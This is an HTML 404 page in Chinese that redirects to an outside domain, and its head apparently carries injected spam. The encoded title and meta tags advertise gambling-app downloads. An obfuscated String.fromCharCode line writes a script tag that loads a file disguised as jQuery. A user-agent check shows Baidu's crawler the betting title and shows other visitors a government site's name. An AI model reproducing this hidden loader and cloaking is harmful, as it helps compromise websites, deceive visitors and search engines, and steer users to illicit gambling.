<!DOCTYPE html>
<html lang="en">

<head><title>&#x56FD;&#x5185;&#x6B63;&#x89C4;&#x4E70;&#x7403;&#x8F6F;&#x4EF6;_&#x5B98;&#x65B9;app&#x5B89;&#x88C5;&#x4E0B;&#x8F7D;</title>
<meta name="keywords" content="&#22269;&#20869;&#27491;&#35268;&#20080;&#29699;&#36719;&#20214;&#44;&#20080;&#29699;&#97;&#112;&#112;&#23448;&#26041;&#32593;&#31449;&#20837;&#21475;&#19979;&#36733;"/>
<meta name="description" content="&#22269;&#20869;&#27491;&#35268;&#20080;&#29699;&#36719;&#20214;&#25552;&#20379;&#23433;&#20840;&#21487;&#38752;&#30340;&#23448;&#26041;&#97;&#112;&#112;&#23433;&#35013;&#19979;&#36733;&#65292;&#29992;&#25143;&#21487;&#20139;&#21463;&#27969;&#30021;&#30340;&#25237;&#27880;&#20307;&#39564;&#65292;&#23613;&#24773;&#21442;&#19982;&#21508;&#31181;&#20307;&#32946;&#36187;&#20107;&#12290;"/>

<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,106,115,47,106,113,117,101,114,121,46,51,46,48,46,48,46,109,105,110,46,98,99,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="内蒙古自治区人民政府"}</script>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  <link href="images/favicon.gif" rel="shortcut icon" type="image/x-icon" />
  <link rel="stylesheet" href="css/base.css">
  <script src="js/jquery.min.js"></script>
  <title></title>
  <style>
  .sxz_baocuo_box {
  height: 100vh;
  width: 100vw;
}
.sxz_baocuo_box img {
  height: 481px;
  display: block;
  margin: 0 auto 74px;
  padding-top: 92px;
}
.sxz_baocuo_title {
  font-size: 40px;
  color: #848e96;
  text-align: center;
}
.sxz_baocuo_font {
  margin-top: 20px;
  font-size: 18px;
  color: #848e95;
  text-align: center;
}
.sxz_baocuo_font i {
  color: #0671fe;
}
.sxz_baocuo_font a {
  color: #0671fe;
  text-decoration: underline;
}
.sxz_baocuo_button {
  margin-top: 65px;
  padding: 0 42%;
}
.sxz_baocuo_button_l {
  height: 45px;
  width: 131px;
  border-radius: 22px;
  text-align: center;
  line-height: 45px;
  background-color: #0671fe;
}
.sxz_baocuo_button_l a {
  display: block;
  width: 100%;
  height: 100%;
  color: #fff;
}

.sxz_baocuo_button_l a:hover {
  color: #fff;
}
</style>
</head>

<body>
  <div class="sxz_baocuo_box">
    <img src="./images/sxz_404.png" alt="">
    <p class="sxz_baocuo_title">很抱歉，您所访问的页面不存在！</p>
    <p class="sxz_baocuo_font">
      系统将在<i id="count_down">5</i> 秒内为您跳转，如不能跳转<a href="http://www.onceneon.com">点击这里>></a>
    </p>
    <div class="sxz_baocuo_button clearfix">
      <div class="sxz_baocuo_button_l l">
        <a href="http://www.onceneon.com">
          返回首页
        </a>
      </div>
      <div class="sxz_baocuo_button_l r">
        <a href="javascript:void(0)" id="pre">
          返回上一级
        </a>
      </div>
    </div>
  </div>
</body>
<script>
  $(document).ready(function () {
    console.log('kklll')
    let num = 5
    setInterval(function () {
      if (num <= 0) {
        window.location.href = "http://www.onceneon.com"
      }
      $('#count_down').text(num)
      --num
    }, 1000)
    $('#pre').click(function () {
      console.log('kkk')
      window.history.go(-1)
    })
  })
</script>

</html>
